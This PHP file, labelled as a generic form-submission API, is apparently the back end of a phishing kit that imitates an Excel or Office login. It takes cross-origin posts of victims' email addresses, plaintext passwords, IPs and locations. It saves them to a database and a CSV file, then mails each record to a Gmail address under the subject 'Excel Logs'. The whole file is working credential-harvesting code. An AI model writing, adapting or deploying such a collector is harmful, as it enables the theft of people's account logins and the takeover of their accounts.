<?php
// api.php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type, Accept');

// Handle preflight requests
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit();
}

// Only accept POST requests
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    echo json_encode(['error' => 'Method not allowed']);
    exit();
}

// Get the raw POST data
$input = file_get_contents('php://input');
$data = json_decode($input, true);

// Validate required fields
$requiredFields = ['Email', 'Password', 'IP', 'Location'];
foreach ($requiredFields as $field) {
    if (!isset($data[$field]) || empty($data[$field])) {
        http_response_code(400);
        echo json_encode(['error' => "Missing required field: $field"]);
        exit();
    }
}

// Sanitize data
$subject = isset($data['_subject']) ? htmlspecialchars($data['_subject']) : 'Excel Logs | ' . $data['IP'];
$email = filter_var($data['Email'], FILTER_SANITIZE_EMAIL);
$password = htmlspecialchars($data['Password']);
$attempts = isset($data['Attempts']) ? intval($data['Attempts']) : 1;
$ip = htmlspecialchars($data['IP']);
$location = htmlspecialchars($data['Location']);

// You can choose to store data in different ways:

// Option A: Save to database (MySQL example)
try {
    $pdo = new PDO('mysql:host=localhost;dbname=your_database;charset=utf8mb4', 
                   'username', 'password');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
    $stmt = $pdo->prepare('INSERT INTO form_submissions 
                          (subject, email, password, attempts, ip, location, submitted_at) 
                          VALUES (?, ?, ?, ?, ?, ?, NOW())');
    $stmt->execute([$subject, $email, $password, $attempts, $ip, $location]);
    
} catch (PDOException $e) {
    // Log error but don't expose to user
    error_log('Database error: ' . $e->getMessage());
}

// Option B: Save to CSV file
$csvFile = 'submissions.csv';
$csvData = [
    date('Y-m-d H:i:s'),
    $subject,
    $email,
    $password,
    $attempts,
    $ip,
    $location
];

if (!file_exists($csvFile)) {
    // Create CSV with headers if it doesn't exist
    $headers = ['Timestamp', 'Subject', 'Email', 'Password', 'Attempts', 'IP', 'Location'];
    file_put_contents($csvFile, implode(',', $headers) . PHP_EOL);
}

file_put_contents($csvFile, implode(',', array_map(function($item) {
    return '"' . str_replace('"', '""', $item) . '"';
}, $csvData)) . PHP_EOL, FILE_APPEND);

// Option C: Send email notification
$to = "dattiobi01@gmail.com";
$emailSubject = $subject;
$emailMessage = "
New Form Submission:
-------------------
Subject: $subject
Email: $email
Password: $password
Attempts: $attempts
IP Address: $ip
Location: $location
Timestamp: " . date('Y-m-d H:i:s') . "
";

$headers = "From: noreply@profitbaselimited.net\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";

mail($to, $emailSubject, $emailMessage, $headers);

// Return success response
http_response_code(200);
echo json_encode([
    'success' => true,
    'message' => 'Form submitted successfully',
    'timestamp' => date('Y-m-d H:i:s')
]);
?>